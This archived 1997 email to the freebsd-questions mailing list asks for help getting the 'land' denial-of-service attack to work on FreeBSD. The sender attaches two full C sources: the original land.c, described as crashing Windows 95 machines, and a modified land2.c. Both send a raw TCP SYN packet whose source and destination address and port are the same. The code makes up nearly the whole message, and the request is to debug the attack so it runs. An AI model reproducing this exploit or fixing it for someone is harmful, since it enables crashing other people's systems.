From owner-freebsd-questions Mon Nov 24 16:17:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id QAA18836 for questions-outgoing; Mon, 24 Nov 1997 16:17:07 -0800 (PST) (envelope-from owner-freebsd-questions) Received: from public.cq.sc.cn (public.cq.cq.cn [202.98.32.111] (may be forged)) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id QAA18822 for ; Mon, 24 Nov 1997 16:16:55 -0800 (PST) (envelope-from hmin@public.cq.sc.cn) Received: from huangmin (ppp41.cq.sc.cn [202.98.33.41]) by public.cq.sc.cn (SMI-8.6/8.6.11) with SMTP id IAA18248 for ; Tue, 25 Nov 1997 08:16:35 +0800 Message-ID: <347A16DF.D03@public.cq.sc.cn> Date: Tue, 25 Nov 1997 08:07:59 +0800 From: hmin Reply-To: hmin@public.cq.sc.cn Organization: kh2 Co. X-Mailer: Mozilla 3.01Gold (Win95; I) MIME-Version: 1.0 To: Freebsd-questions@freebsd.org Subject: The land.c Content-Type: multipart/mixed; boundary="------------7C3062BB5F7D" Sender: owner-freebsd-questions@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is a multi-part message in MIME format. --------------7C3062BB5F7D Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit hi, sir: I got "land" attack source code some days ago, I don't know which programming tool can compile it, my Freebsd 2.2.5 box cann't do that. I changed the cource code a little, and want it work on my FreeBSD 2.2.5 box. The gcc build ok, but seems it didn't do the work it should, I don't what's the problem. I attach the origin code and my code here, if you have a time to correct my fault, I'll appreciate your help. Huang Min --------------7C3062BB5F7D Content-Type: text/plain; charset=us-ascii; name="land.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="land.c" /* land.c by m3lt, FLC crashes a win95 box */ #include #include #include #include #include #include #include #include #include struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); } --------------7C3062BB5F7D Content-Type: text/plain; charset=us-ascii; name="land2.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="land2.c" /* land.c by m3lt, FLC crashes a win95 box */ #define __BSD_SOURCE #define BYTE_ORDER LITTLE_ENDIAN #include #include #include #include #include #include #include #include #include #include struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct ip * ipheader=(struct ip *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip)); struct pseudohdr pseudoheader; /* fprintf(stderr,"land.c by m3lt, FLC\n");*/ if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr)); ipheader->ip_v=4; /* ipheader->ip_hl=sizeof(struct ip)/4;*/ ipheader->ip_hl=sizeof(struct ip)/4; ipheader->ip_len=htons(sizeof(struct ip)+sizeof(struct tcphdr)); ipheader->ip_id=htons(0xF1C); ipheader->ip_ttl=255; ipheader->ip_p=IPPROTO_TCP; ipheader->ip_src.s_addr=sin.sin_addr.s_addr; ipheader->ip_dst.s_addr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); } --------------7C3062BB5F7D--